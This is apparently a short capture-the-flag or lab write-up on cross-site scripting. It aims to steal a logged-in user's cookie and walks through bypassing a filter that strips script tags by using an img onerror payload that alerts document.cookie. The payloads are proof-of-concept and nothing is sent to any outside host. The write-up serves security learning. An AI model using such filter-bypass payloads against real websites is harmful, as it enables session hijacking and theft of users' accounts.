  

### Objective

One way or another, steal the cookie of a logged in user.

Again let's try running our common stuff.
```html
<script>alert(1)</script>
```
Response
```html
Hello alert(1)
```
Looks like it's filtering script too. Let's try other tags.
```html
<h1>xss</h1>
```
Response
```html
Hello 
# xss
```
Okay so it's not filtering <> tags. So just script tags got it.
Let's use classic img tags
```html
<img src=# onerror=alert(document.cookie)
```
And XSS will pop off.

